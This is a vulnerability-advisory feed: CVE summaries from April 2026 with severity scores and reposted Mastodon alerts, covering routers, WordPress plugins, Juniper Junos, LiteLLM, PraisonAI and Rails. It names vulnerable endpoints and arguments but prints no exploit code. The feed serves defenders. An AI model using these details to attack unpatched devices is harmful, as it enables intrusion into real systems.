Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects VideoPro: from n/a through 2.3.8.1.

thehackerwire@mastodon.social at 2026-04-11T07:04:51.000Z ##

🟠 CVE-2025-58913 - High (8.1)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects VideoPro: from n/a through 2.3.8.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:04:51.000Z ##

🟠 CVE-2025-58913 - High (8.1)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects VideoPro: from n/a through 2.3.8.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40217
(8.8 HIGH)

EPSS: 0.19%

updated 2026-04-10T15:32:07

2 posts

LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.

thehackerwire@mastodon.social at 2026-04-11T07:03:37.000Z ##

🟠 CVE-2026-40217 - High (8.8)

LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:03:37.000Z ##

🟠 CVE-2026-40217 - High (8.8)

LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33092
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T15:32:05

2 posts

Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.

thehackerwire@mastodon.social at 2026-04-11T07:04:41.000Z ##

🟠 CVE-2026-33092 - High (7.8)

Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:04:41.000Z ##

🟠 CVE-2026-33092 - High (7.8)

Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40088
(9.7 CRITICAL)

EPSS: 0.05%

updated 2026-04-10T14:41:51

1 posts

The `execute_command` function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters. --- ## Description PraisonAI's workflow system and command execution tools pass user-controlled input directly to `subprocess.run()` with `shell=Tr

thehackerwire@mastodon.social at 2026-04-10T07:10:58.000Z ##

🔴 CVE-2026-40088 - Critical (9.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-5804
(7.5 HIGH)

EPSS: 0.07%

updated 2026-04-10T14:16:25.450000

2 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion.This issue affects Case Theme User: from n/a before 1.0.4.

thehackerwire@mastodon.social at 2026-04-11T07:05:02.000Z ##

🟠 CVE-2025-5804 - High (7.5)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion.This issue affects Case Theme User: from n/a before 1.0.4.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:05:02.000Z ##

🟠 CVE-2025-5804 - High (7.5)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion.This issue affects Case Theme User: from n/a before 1.0.4.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5412
(9.9 CRITICAL)

EPSS: 0.04%

updated 2026-04-10T13:16:45.780000

2 posts

In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21.

thehackerwire@mastodon.social at 2026-04-11T07:06:33.000Z ##

🔴 CVE-2026-5412 - Critical (9.9)

In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:06:33.000Z ##

🔴 CVE-2026-5412 - Critical (9.9)

In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1115
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-04-10T13:16:43.970000

1 posts

A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious Jav

offseq@infosec.exchange at 2026-04-10T09:00:31.000Z ##

⚠️ CVE-2026-1115: CRITICAL stored XSS in parisneo/lollms <2.2.0. Unsanitized input in create_post lets attackers run JS in user browsers via Home Feed. Upgrade to 2.2.0+ now! radar.offseq.com/threat/cve-20 #OffSeq #XSS #Vuln #Security

##

CVE-2026-6029
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T09:31:21

1 posts

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument User results in os command injection. The attack may be launched remotely. The exploit is now public and may be used.

offseq@infosec.exchange at 2026-04-10T07:30:30.000Z ##

⚠️ CVE-2026-6029 (CRITICAL, CVSS 9.3): Totolink A7100RU firmware 7.4cu.2313_b20191024 is vulnerable to unauthenticated OS command injection via setVpnAccountCfg. No patch yet — restrict access and monitor for updates. radar.offseq.com/threat/cve-20 #OffSeq #CVE20266029 #Infosec

##

CVE-2026-6025
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T06:31:49

1 posts

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-10T06:59:55.000Z ##

🔴 CVE-2026-6025 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6016
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T06:31:44

1 posts

A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the function decodePwd of the file /goform/WizardHandle of the component POST Request Handler. Performing a manipulation of the argument WANS results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-10T07:00:15.000Z ##

🟠 CVE-2026-6016 - High (8.8)

A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the function decodePwd of the file /goform/WizardHandle of the component POST Request Handler. Performing a manipulation of the argument WANS results in stack-based buffer...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6014
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T06:31:44

1 posts

A flaw has been found in D-Link DIR-513 1.10. This issue affects the function formAdvanceSetup of the file /goform/formAdvanceSetup of the component POST Request Handler. This manipulation of the argument webpage causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer support

thehackerwire@mastodon.social at 2026-04-10T05:46:35.000Z ##

🟠 CVE-2026-6014 - High (8.8)

A flaw has been found in D-Link DIR-513 1.10. This issue affects the function formAdvanceSetup of the file /goform/formAdvanceSetup of the component POST Request Handler. This manipulation of the argument webpage causes buffer overflow. It is poss...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6013
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T06:31:44

1 posts

A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects the function formSetRoute of the file /goform/formSetRoute of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported

thehackerwire@mastodon.social at 2026-04-10T05:46:25.000Z ##

🟠 CVE-2026-6013 - High (8.8)

A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects the function formSetRoute of the file /goform/formSetRoute of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6015
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T06:16:06.510000

1 posts

A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the function formQuickIndex of the file /goform/QuickIndex of the component POST Request Handler. Such manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-10T07:00:05.000Z ##

🟠 CVE-2026-6015 - High (8.8)

A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the function formQuickIndex of the file /goform/QuickIndex of the component POST Request Handler. Such manipulation of the argument PPPOEPassword leads to stack-based buffer over...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6012
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T05:16:07.027000

1 posts

A security vulnerability has been detected in D-Link DIR-513 1.10. This affects the function formSetPassword of the file /goform/formSetPassword of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products

thehackerwire@mastodon.social at 2026-04-10T05:46:15.000Z ##

🟠 CVE-2026-6012 - High (8.8)

A security vulnerability has been detected in D-Link DIR-513 1.10. This affects the function formSetPassword of the file /goform/formSetPassword of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overfl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5994
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T03:31:16

2 posts

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-10T06:00:28.000Z ##

⚠️ CVE-2026-5994: CRITICAL OS command injection in Totolink A7100RU (7.4cu.2313_b20191024). Remote attackers can run OS commands via setTelnetCfg. No patch yet; public exploit released. Restrict access & monitor traffic. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RouterSecurity

##
thehackerwire@mastodon.social at 2026-04-10T03:03:00.000Z ##

🔴 CVE-2026-5994 - Critical (9.8)

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled resu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5996
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T03:31:16

2 posts

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tty_server leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.

offseq@infosec.exchange at 2026-04-10T04:30:29.000Z ##

⚠️ CRITICAL: CVE-2026-5996 in Totolink A7100RU (7.4cu.2313_b20191024) enables unauthenticated OS command injection via /cgi-bin/cstecgi.cgi. No patch yet — restrict remote access & monitor devices. More: radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #IoTSecurity

##
thehackerwire@mastodon.social at 2026-04-10T03:01:02.000Z ##

🔴 CVE-2026-5996 - Critical (9.8)

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tty_serve...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5993
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T03:31:16

1 posts

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setWiFiGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wifiOff leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-10T03:27:55.000Z ##

🔴 CVE-2026-5993 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setWiFiGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wifiOff leads to os c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25203
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T03:31:16

1 posts

Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability This issue affects MagicINFO 9 Server: less than 21.1091.1.

thehackerwire@mastodon.social at 2026-04-10T03:02:50.000Z ##

🟠 CVE-2026-25203 - High (7.8)

Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability

This issue affects MagicINFO 9 Server: less than 21.1091.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4351
(8.1 HIGH)

EPSS: 0.06%

updated 2026-04-10T03:31:16

1 posts

The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` handlers without any authorization check or nonce verification. The `$_GET['snippets'][]` values are passed unsanitized to `Snippet::activate()`/`Snippet::

thehackerwire@mastodon.social at 2026-04-10T03:02:39.000Z ##

🟠 CVE-2026-4351 - High (8.1)

The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` ha...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3360
(7.5 HIGH)

EPSS: 0.10%

updated 2026-04-10T03:31:16

1 posts

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fie

thehackerwire@mastodon.social at 2026-04-10T03:01:23.000Z ##

🟠 CVE-2026-3360 - High (7.5)

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pa...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5997
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T02:16:04.247000

2 posts

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:01:14.000Z ##

🔴 CVE-2026-5997 - Critical (9.8)

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-10T03:00:28.000Z ##

Totolink A7100RU (7.4cu.2313_b20191024) hit by CRITICAL OS command injection (CVE-2026-5997) — remote, unauthenticated code execution possible. No patch yet. Disable remote management & limit access! radar.offseq.com/threat/cve-20 #OffSeq #CVE20265997 #RouterSecurity #Vuln

##

CVE-2026-33170(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-04-10T01:59:00

2 posts

### Impact `SafeBuffer#%` does not propagate the `@html_unsafe` flag to the newly created buffer. If a `SafeBuffer` is mutated in place (e.g. via `gsub!`) and then formatted with `%` using untrusted arguments, the result incorrectly reports `html_safe? == true`, bypassing ERB auto-escaping and possibly leading to XSS. ### Releases The fixed releases are available at the normal locations. ### Cre

vitobotta@mastodon.social at 2026-04-10T21:54:37.000Z ##

CVE-2026-33170 is fascinating because it breaks Rails' own XSS protection system. SafeBuffer#% operator fails to propagate the html_unsafe flag when creating new buffers, so content that should be escaped gets marked as safe.

It's a flaw in the security mechanism itself, not just another injection point. Rails apps using SafeBuffer with the % operator for formatting could be exposing XSS vulnerabilities without realising their protection layer is compromised.

##
vitobotta@mastodon.social at 2026-04-10T21:54:37.000Z ##

CVE-2026-33170 is fascinating because it breaks Rails' own XSS protection system. SafeBuffer#% operator fails to propagate the html_unsafe flag when creating new buffers, so content that should be escaped gets marked as safe.

It's a flaw in the security mechanism itself, not just another injection point. Rails apps using SafeBuffer with the % operator for formatting could be exposing XSS vulnerabilities without realising their protection layer is compromised.

##

CVE-2026-5995
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T01:16:42.490000

2 posts

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument lan_info can lead to os command injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-10T03:27:46.000Z ##

🔴 CVE-2026-5995 - Critical (9.8)

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument lan_info can lead to os...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-10T01:30:28.000Z ##

🛑 CRITICAL: CVE-2026-5995 in Totolink A7100RU (7.4cu.2313_b20191024) enables remote, unauthenticated OS command injection via /cgi-bin/cstecgi.cgi. No patch yet — disable remote mgmt & restrict access. radar.offseq.com/threat/cve-20 #OffSeq #Infosec #Vulnerability

##

CVE-2026-35638
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 posts

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the Control UI that allows unauthenticated sessions to retain self-declared privileged scopes without device identity verification. Attackers can exploit the device-less allow path in the trusted-proxy mechanism to maintain elevated permissions by declaring arbitrary scopes, bypassing device identity requirements.

thehackerwire@mastodon.social at 2026-04-10T05:53:46.000Z ##

🟠 CVE-2026-35638 - High (8.8)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the Control UI that allows unauthenticated sessions to retain self-declared privileged scopes without device identity verification. Attackers can exploit the device-less al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5983
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 posts

A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects the function formSetDDNS of the file /goform/formSetDDNS of the component POST Request Handler. Executing a manipulation of the argument curTime can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This vulnerability only affects products that are

thehackerwire@mastodon.social at 2026-04-10T04:03:25.000Z ##

🟠 CVE-2026-5983 - High (8.8)

A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects the function formSetDDNS of the file /goform/formSetDDNS of the component POST Request Handler. Executing a manipulation of the argument curTime can lead to buffer overf...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5982
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 posts

A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects the function formAdvNetwork of the file /goform/formAdvNetwork of the component POST Request Handler. Performing a manipulation of the argument curTime results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This vulnerability only affects products

thehackerwire@mastodon.social at 2026-04-10T04:03:15.000Z ##

🟠 CVE-2026-5982 - High (8.8)

A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects the function formAdvNetwork of the file /goform/formAdvNetwork of the component POST Request Handler. Performing a manipulation of the argument curTime results in buf...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5981
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 posts

A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the function formAdvFirewall of the file /goform/formAdvFirewall of the component POST Request Handler. Such manipulation of the argument curTime leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no long

thehackerwire@mastodon.social at 2026-04-10T04:00:13.000Z ##

🟠 CVE-2026-5981 - High (8.8)

A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the function formAdvFirewall of the file /goform/formAdvFirewall of the component POST Request Handler. Such manipulation of the argument curTime leads to buffer overflow. The...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5988
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 posts

A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Performing a manipulation of the argument mit_ssid results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:59:52.000Z ##

🟠 CVE-2026-5988 - High (8.8)

A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Performing a manipulation of the argument mit_ssid results in stack-based buffer overflow. The attack can be initiat...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5992
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 posts

A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function fromP2pListFilter of the file /goform/P2pListFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-10T03:45:35.000Z ##

🟠 CVE-2026-5992 - High (8.8)

A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function fromP2pListFilter of the file /goform/P2pListFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is po...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5991
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 posts

A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the function formWrlExtraSet of the file /goform/WrlExtraSet. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-10T03:45:25.000Z ##

🟠 CVE-2026-5991 - High (8.8)

A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the function formWrlExtraSet of the file /goform/WrlExtraSet. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be launched remotel...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5989
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 posts

A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteStatic of the file /goform/RouteStatic. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:28:06.000Z ##

🟠 CVE-2026-5989 - High (8.8)

A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteStatic of the file /goform/RouteStatic. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be launched remotely. The ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33778
(7.5 HIGH)

EPSS: 0.06%

updated 2026-04-10T00:30:37

1 posts

An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial-of-Service (DoS). If an affected device receives a specifically malformed first ISAKMP packet from the initiator, the kmd/iked process will crash and r

thehackerwire@mastodon.social at 2026-04-10T06:11:24.000Z ##

🟠 CVE-2026-33778 - High (7.5)

An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33785
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T00:30:37

1 posts

A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices. Any user logged in, without requiring specific privileges, can issue 'request csds' CLI operational commands. These commands are only meant to be executed by high

thehackerwire@mastodon.social at 2026-04-10T06:08:19.000Z ##

🟠 CVE-2026-33785 - High (8.8)

A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices.

Any user l...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33790
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:37

1 posts

An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. Duri

thehackerwire@mastodon.social at 2026-04-10T06:08:01.000Z ##

🟠 CVE-2026-33790 - High (7.5)

An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and res...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33793
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T00:30:37

1 posts

An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system. When a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, lea

thehackerwire@mastodon.social at 2026-04-10T05:59:55.000Z ##

🟠 CVE-2026-33793 - High (7.8)

An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system.

When a configurat...

